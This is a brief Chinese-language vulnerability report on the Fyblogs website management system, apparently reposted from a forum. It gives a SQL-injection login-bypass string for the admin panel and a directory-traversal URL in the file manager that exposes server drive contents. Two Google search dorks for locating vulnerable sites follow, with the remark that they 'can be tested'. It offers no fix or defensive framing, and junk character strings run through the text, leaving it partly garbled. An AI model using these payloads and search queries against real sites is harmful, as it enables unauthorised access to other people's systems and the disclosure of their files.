漏洞类型: 未授权访问/权限绕过* K% W9 Q6 X/ U; i7 S6 H1 ~9 A, f) r
, q3 s) X& q& W) r1 }" L简要描述:
' k9 m5 T- f# q4 S5 t
! s% j4 D2 m: LFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 I' ~7 q; K6 a) T! R+ ^
7 d: [4 _) h ~/ O5 J
详细说明:. z6 b( s% I% E" e. b
+ m9 l+ R0 w/ r& @; C8 l+ K
后台万能密码 'or'='or'
$ n3 g0 T5 F. {后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
. y/ u, \2 X- |* l( p( tadmin/uploadfile.asp?currentFolder=/upfiles/../4 h* p8 H* Y9 k( m9 Z/ p
2 v, O3 G2 ]; u漏洞证明:$ e+ n6 G0 k8 y! d; ~
( j( a0 u: M% n- R n; N谷歌:inurl:type.asp?id=1 新闻中心
' O9 q% ~6 O7 n或者 :inurl:download_ok.asp?
) Q) m8 h% b0 e. ?0 K: _4 v+ ~3 D2 g3 Q d
可以测试
# {5 b0 w4 o9 ?8 ^, |% \0 K1 T( H% K
2 H4 |. \* I7 h; u x& _; d |